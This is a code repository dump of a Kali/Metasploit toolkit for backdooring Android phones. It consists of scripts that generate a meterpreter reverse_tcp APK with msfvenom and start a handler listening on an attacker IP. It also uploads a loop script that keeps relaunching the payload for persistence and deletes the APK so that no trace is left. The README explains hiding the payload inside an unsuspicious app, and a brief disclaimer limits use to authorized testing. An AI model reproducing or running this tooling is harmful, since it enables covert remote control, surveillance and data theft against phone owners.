├── backdoor.rb ├── alwaysOpen.sh ├── android.rb ├── setup ├── connect ├── README.txt ├── LICENSE ├── exploit └── README.md /backdoor.rb: -------------------------------------------------------------------------------- 1 | cd / 2 | cd /sdcard/Download 3 | upload /root/Desktop/Metasploit/alwaysOpen.sh /sdcard/Download 4 | shell 5 | 6 | -------------------------------------------------------------------------------- /alwaysOpen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | while : 3 | do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity 4 | sleep 20 5 | done 6 | -------------------------------------------------------------------------------- /android.rb: -------------------------------------------------------------------------------- 1 | # Script created by Aaron Vigal http://www.aaronvigal.com 2 | use exploit/multi/handler 3 | set payload android/meterpreter/reverse_tcp 4 | set lhost 10.1.6.133 5 | set lport 443 6 | clear 7 | exploit 8 | exit 9 | -------------------------------------------------------------------------------- /setup: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Script made by Aaron Vigal. http://www.aaronvigal.com 3 | 4 | mkdir ~/Desktop/Metasploit 5 | mkdir ~/Desktop/Metasploit/Android 6 | # Download needed files from github 7 | git clone https://github.com/AaronVigal/Metasploit-Android.git ~/Desktop/Metasploit/Android 8 | # Install dependencies 9 | sudo apt-get -y install at>/dev/null 10 | sudo apt-get -y install libnotify-bin>/dev/null 11 | # Make file executable 12 | sudo chmod +x ~/Desktop/Metasploit/Android/exploit 13 | sudo chmod +x ~/Desktop/Metasploit/Android/connect 14 | # Remove setup file 15 | rm setup 16 | notify-send "Metasploit-Android is done installing :)" 17 | -------------------------------------------------------------------------------- /connect: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Script made by Aaron Vigal. http://www.aaronvigal.com 3 | 4 | read -p "What is the IP Address to listen on? " internalip; 5 | port="443" 6 | 7 | # Replace the new variables in the custom metasploit script 8 | sed -i '4s/.*/set lhost '$internalip'/' /root/Desktop/Metasploit/Android/android.rb 9 | sed -i '5s/.*/set lport '$port'/' /root/Desktop/Metasploit/Android/android.rb 10 | 11 | # Execute the newly updated script (android.rb) 12 | msfconsole -r /root/Desktop/Metasploit/Android/android.rb 13 | 14 | # Delete the APK on close and say goodbye 15 | echo "From the wise words of Kevin Dickerson...";echo "Get lit.";echo "Get good.";echo "Party hard.";echo "";echo "Happy Hacking!!!";echo "" 16 | -------------------------------------------------------------------------------- /README.txt: -------------------------------------------------------------------------------- 1 | ####################################################### 2 | ## Created by Aaron Vigal. http://www.aaronvigal.com ## 3 | ####################################################### 4 | Setup: 5 | > There should be 6 files inside of a folder named Metasploit on your Desktop 6 | > The 4 required files are: 7 | * alwaysOpen.sh 8 | * exploit 9 | * connect 10 | * android.rb 11 | * backdoor.rb 12 | 13 | Step 1. 14 | > Navigate to the Metasploit folder on the Desktop 15 | 16 | Step 2. 17 | > Open up a terminal and run "./exploit" if you haven't made the APK yet 18 | > Run "./connect" if you have already made the APK 19 | Hint: If the file doessn't have the needed permissions, run chmod +x android 20 | 21 | Step 3. (If not already done) 22 | > Install and run MainActivity on your android device 23 | 24 | Step 4. 25 | > Once a meterpreter session opens, run the following command: 26 | "resource /root/Desktop/Metasploit/Android/backdoor.rb" 27 | 28 | Step 5. 29 | > Type the following 3 commands: 30 | 1. cd / 31 | 2. cd /sdcard/Download 32 | 3. sh alwaysOpen.sh 33 | 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2016 Aaron Vigal 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /exploit: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Script made by Aaron Vigal. http://www.aaronvigal.com 3 | 4 | read -p "Name your APK file: " name 5 | read -p "What is the internal IP Address? " internalip; 6 | read -p "What is the external IP Address? " externalip; 7 | read -p "What is the port number? " port 8 | 9 | # Create the APK in /root/Desktop/Metasploit with the specified name 10 | msfvenom -p android/meterpreter/reverse_tcp --platform Android --arch dalvik LHOST=$externalip LPORT=$port R > $name.apk 11 | 12 | # Replace the new variables in the custom metasploit script 13 | sed -i '4s/.*/set lhost '$internalip'/' /root/Desktop/Metasploit/Android/android.rb 14 | sed -i '5s/.*/set lport '$port'/' /root/Desktop/Metasploit/Android/android.rb 15 | 16 | # Tell them that it's all ready 17 | echo "APK File named $name has been created with IP $ip and port $port!" 18 | echo "Exploiting..." 19 | 20 | # Execute the newly updated script (android.rb) 21 | msfconsole -r /root/Desktop/Metasploit/Android/android.rb 22 | 23 | # Delete the APK on close and say goodbye 24 | rm /root/Desktop/Metasploit/Android/$name.apk 25 | echo "";echo "The APK has been removed and there is no trace remaining ;)";echo "";echo "From the wise words of Kevin Dickerson...";echo "Get lit.";echo "Get good.";echo "Party hard.";echo "";echo "Happy Hacking!!!";echo "" 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Metasploit-Android 2 | This module uses the Metasploit framework built into Kali-Linux to create and Android APK that will allow a back door into the users phone. The script creates the malicious APK file and embeds it into a normal, unsuspicious APK that when opened, will automatically trigger a Perl script to create a persistent backdoor into the users phone. This can be done in two ways, over your local area network (LAN), or you can open a port for the data to be sent to and listen on the local binding for the data coming in. These options can be specified during the process of the script creating the APK. 3 | 4 | This tool should run under most versions of Linux but is optimized for working on Kali. The setup is very straight-forward just copy and paste the following code into a terminal: 5 | 6 | ```{r, engine='bash', count_lines} 7 | wget https://raw.githubusercontent.com/AaronVigal/Metasploit-Android/master/setup 8 | sudo chmod +x setup 9 | sudo ./setup 10 | cd ~/Desktop/Metasplot/Android 11 | sudo ./exploit 12 | ``` 13 | 14 | The setup file checks/installs the following dependencies: 15 | 16 | 1. Metasploit Framework 17 | 2. Ruby 18 | 19 | ##*Warning!!!* 20 | Me, my Affiliates and all of this projects Contributers in no way promote or encourage un-lawful hacking and this toolkit should be rightfully used for it's purpose for penetration testing on your own network or any network that you have explicit consent from the Administrator. Me, my Affiliates and any Contributers cannot and will not be held liable for any damage or unlawful action that may occur while using this toolkit. 21 | 22 | Happy Hacking! 23 | --------------------------------------------------------------------------------